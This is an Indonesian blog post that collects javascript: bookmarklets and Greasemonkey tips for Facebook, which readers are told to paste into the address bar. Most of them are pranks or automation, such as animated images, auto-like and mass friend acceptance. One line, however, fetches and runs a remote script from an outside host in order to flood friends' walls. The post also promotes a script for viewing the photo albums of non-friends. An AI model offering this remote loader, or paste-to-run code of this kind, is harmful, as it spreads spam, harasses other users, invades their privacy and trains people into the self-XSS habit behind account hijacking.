Rabu, 15 Juni 2011

Kumpulan Script Menarik dan Unik Serta Tips dan Trik Buat Facebook Dan Web

Hallo sobat semua..gimana kabarnya hari ini??? Semoga selalu dalam keadaan baik. Rasanya udah lama nich gak posting di blog..Sekarang Postingan Saya ini tentang Script Unik.. Pas tadi saya Googling buka-buka situs eh gak sengaja nemu Script Menarik Dan Unik  Contonya Membuat Script Untuk membuat Browser Bergerak-gerak Beraturan atau Bergerak liarr hehehe..Ada juga script untuk para pecinta facebook yang ingin tampilannya menjadi unik dan aneh..tapi tampilan ini tidak permanen atau bersipat sementara..dan tampilannya hanya terlihat oleh kita sendirii..hihii..
Okee..langsung aja ke script nya bisa di lihat dibawah ini..bolehh di copy paste..heu..
Script Unik Buat Facebook :
  •  Auto Like Pada Semua Status Di Facebook
 javascript:var i=0;ex=0;s=0;function EXP_ALL(){ExpandComm = document.getElementsByTagName("input");for(e = 0; e < ExpandComm.length; e++){myClass = ExpandComm[e].getAttribute("class"); if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(ExpandComm[e].getAttribute("name") == "view_all")ExpandComm[e].click()}}function JEMPOLERS(){jempol = document.getElementsByTagName("button");for(j = 0; j < jempol.length; j++){myClass = jempol[j].getAttribute("class"); if(myClass != null && myClass.indexOf("like_link") >= 0)if(jempol[j].getAttribute("name") == "like")jempol[j].click()};}function JEMPOLERC(){buttons = document.getElementsByTagName("button");for(x = 0; x < buttons.length; x++){myClass = buttons[x].getAttribute("class"); if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(buttons[x].getAttribute("title") == "Like this comment")buttons[x].click()};}function updateTime(){ex=ex+1;i=i+1;s=s+1;if (ex==5){EXP_ALL();ex=0};if (s==5){ex=0;JEMPOLERS();s=0};if (i==2){JEMPOLERC();i=0;}}alert('-==[LIKE ALL STATUS FACEBOOK]==-\n\nScript by -Yogaz Alvinz-');updateTime();window.setInterval(updateTime, 1000);void(0)


  • Auto Unlike Semua Setatus Di Facebook


javascript:var i=0;ex=0;s=0;function EXP_ALL(){ExpandComm = document.getElementsByTagName

("input");for(e = 0; e < ExpandComm.length; e++){myClass = ExpandComm[e].getAttribute ("c...lass");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(ExpandComm[e].getAttribute

("name") == "view_all")ExpandComm[e].click()}}function JEMPOLERS(){jempol =

document.getElementsByTagName("button");for(j = 0; j < jempol.length; j++){myClass = jempol [j].getAttribute("class");if(myClass != null && myClass.indexOf("like_link") >= 0)if(jempol

[j].getAttribute("name") == "unlike")jempol[j].click()};}function JEMPOLERC(){buttons =

document.getElementsByTagName("button");for(x = 0; x < buttons.length; x++){myClass = buttons [x].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(buttons

[x].getAttribute("title") == "Unlike this comment")buttons[x].click()};}function updateTime(){ex=ex

+1;i=i+1;s=s+1;if (ex==5){EXP_ALL();ex=0};if (s==5){ex=0;JEMPOLERS();s=0};if (i==2){JEMPOLERC();i=0;}}

alert('-==[UNLIKE ALL STATUS FACEBOOK]==-\n\nScript by -Yogaz Alvinz-');updateTime();window.setInterval(updateTime, 1000);void(0)

  • Membuat gambar/foto di Facebook menjadi melayang-layang
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0);
  • Membuat Tampilan Tidak Beraturan 
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)
  • Membuat Tulisan Bergaris Bawah merah seperti di MS Word
javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0
  • Membuat Kumpulan Foto FB Mengikuti Mouse/kusor Kita
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=100; y4=100; var DI= document.images; DIL=DI.length; function A(_X,_Y){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+_X+"px"; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+_Y+"px"}R++}document.onmousemove=function(event){_X = event.clientX; _Y = event.clientY; A(_X,_Y);};document.onmousedown=function(){for(i=0; i<DIL; i++){DI[i].style.position="static";}};void(0)
  • Membanjiri Wall Teman 
javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0);
  • Merubah Tulisan Di Facebook Menjadi warna warni dan berkelap-kelip
javascript:i=0;c=["red","green","blue","yellow","magenta","orange"," pink","violet"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',1);void(0);


Untuk melihat hasilnya ganti URL/adrees bar di facebook anda dan ganti dengan script diatas..Caranya  copy dan paste ke addressbar/URL  script di atas lalu tekan enter maka akan kelihatan dech hasilnyaa........ Beberapa script tidak hanya bekerja pada facebook, coba ke halaman website apa saja.
  • Khusus untuk Cara cepat konfirmasi atau abaikan permintaan teman di facebbok Ikuti caranya di bawah ini :
1. Buka beranda facebook anda, dan klik  pada panel permintaan pertemanan, Lihat gambar



2. Pada halaman baru yang terbuka (halaman permintaan pertemanan)  klik untuk " lihat semua permintaan"
3. Setelah permintaan konfirmasi terlihat semua, copy salah satu  kode script berikut dibawah ini 
  • Script ini untuk menerima semua permintaan secara otomatis
javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0);
  • Script untuk menolak semua permintaan di facebook secara otomatis
javascript:for( i = 1;i<document.getElementsByName("actions[hide]").length;i++){document.getElementsByName("actions[hide]")[i].click();}void(0);
4. Lalu paste kan di atas kotak URL Bar browser anda ( ie/ firefox/ opera/ dll ) dan tekan enter.



tunggu sampai semua teman terkonfirmasi. maka selesailah sudah.
Cara ini bisa mengkonfirmasi maksimal 100 teman . Lakukan langkah yang sama bila teman yang menunggu lebih dari 100 orang.
Kalian juga bisa menggunakan Add Ons untuk Tips unik Facebook kalian diantaranya adalah :

Mengubah warna tampilan facebook biar lebih keren
Auto-Colorizer 
Browser sobat harus terinstall Add-Ons Greasemonkey terlebih dahulu. Jika belum ada Klik DISINI untuk menginstallnya. trus install script diatas.


Melihat Foto Dalam Album
Facebook View Photo in Album
Script yang memungkinkan anda untuk melihat album foto orang-orang yang belum menjadi teman anda. Script ini membutuhkan Add-Ons Greasemonkey.



Menghapus teman
Friend Quick Remove
Bagi sobat yang bingung cara menghapus teman di facebbok mungkin script ini menjadi alternatif yang bagus buat sobat. Sobat bisa menghapus teman yang tidak disukai dengan cepat. Script ini juga membutuhkan Greasemonkey.


Memperbesar Foto / Gambar
InYOf4AceBook
Lelah menyipitkan mata pada gambar thumbnail dari orang dalam pencarian, berpikir mereka agak terlihat seperti orang yang Anda bermaksud untuk menemukan? inYOf4ceBook akan membiarkan Anda menempatkan mouse anda ke atas gambar dan melihat tampilan besar sehingga Anda dapat benar-benar tahu siapa yang Anda cari. Script ini membutuhkan Greasemonkey.



Menghapus Iklan
Remove Facebook Ads
Sesuai namanya, script ini untuk menghapus semua iklan di facebbok seperti banner, sponsor, berita, dsb. Script ini membutuhkan Greasemonkey

Mendownload gambar dengan cepat
Facebook Image Download Helper
Script ini berfungsi seperti ekstensi Firefox seperti DownThemAll! untuk men-download semua gambar pada halaman di Facebook.
Selamat mencoba, semoga berhasil...

Wahh ternyata tips dan trik facebook itu banyak yua hehe..pernahkah anda melihat update setatus temen-temen kalian via berbagai macam handphone atau pun tempat..misalnya 
Update status via BlackBerry? Ah..udah biasa, bosen! jelir
Update via Mobile Phone? Wedew..lebih biasa lagi, udah terlalu sering itu mah…
Kali ini gue bakal share bagaimana cara membuat update status Facebook dengan cara yang beda. Mau update status via WC Umum, Telepon Koin, Pentagon, iPhone, Android, semuanya BISA..!!! Caranya cukup simpel.

Oh..ya, untuk dapat membuat update status Facebook ini, minimal kamu harus memiliki hosting pribadi. Hosting tersebut berfungsi sebagai server dimana kamu akan mengupload script yang gue berikan nanti.

Oke..kita mulai aja untuk melakukan eksperimen ini. Berikut adalah step-by-step yang mesti kamu lakukan.

1. Masuk ke Facebook Developers.
2. Isi nama aplikasi yang kamu inginkan dan klik “I agree” (Saya sejutu gitu loh).
3. Klik “Create Application” (Buat aplikasi).
4. Upload logo dan icon aplikasi kamu (Optional ). Jika tidak ingin, kamu bisa lanjut ke langkah berikutnya.
5. Catat API Key (Kode API) dan Secret Key (Kode Rahasia) aplikasi kamu.

    Api Key & Secret Key

6. Download script update status Facebook dan ekstrak.
7. Pada file “index.php”, lakukan sedikit pengeditan dengan memasukkan API Key dan Secret Key yang telah kamu dapatkan tadi. Pengeditan dapat dilakukan dengan menggunakan aplikasi Notepad++ yang bisa kamu download di http://www.filehippo.com/download_notepad (GRATIS).


                   Edit file index.php

Alihkan sejenak perhatian kamu dari Facebook dan silahkan Log In ke hosting milik kamu.

8. Compress kembali seluruh file tersebut dan upload ke hosting milik kamu melalui File Manager – Web Root (public_html). Setelah file berhasil di upload, jangan lupa untuk mengekstraknya kembali agar script dapat berjalan dengan sempurnya.
Balik lagi ke pengaturan Facebook Developers.

9. Klik tab “Canvas” yang letaknya di sebelah kiri.
10. Pada “Canvas Page URL” silahkan diisi dengan URL yang ingin kamu gunakan. Aplikasi kamu nantinya akan diakses melalui URL tersebut. Misalnya: http://apps.facebook.com/septic-tank
11. Pada “Canvas Callback URL” isi dengan alamat script yang telah kamu upload tadi. Contoh: http://duniahape.com/facebook/apps/septictank 
       Edit Tab Canvas
12. Pada “Metode Render”, pilih “FBML”.
13. Klik “Save”.

       Contoh aplikasi update status Facebook yang udah jadi.
       Update via Septic Tank
Nah..sekarang aplikasi kamu udah bisa digunakan. Kamu bisa update status Facebook kamu dengan “gaya” yang berbeda. menari


Daftar Pustaka : Info ini saya dapatkan dari berbagai sumber dan situs di mesin pencarian Google..

 



0 komentar:

Posting Komentar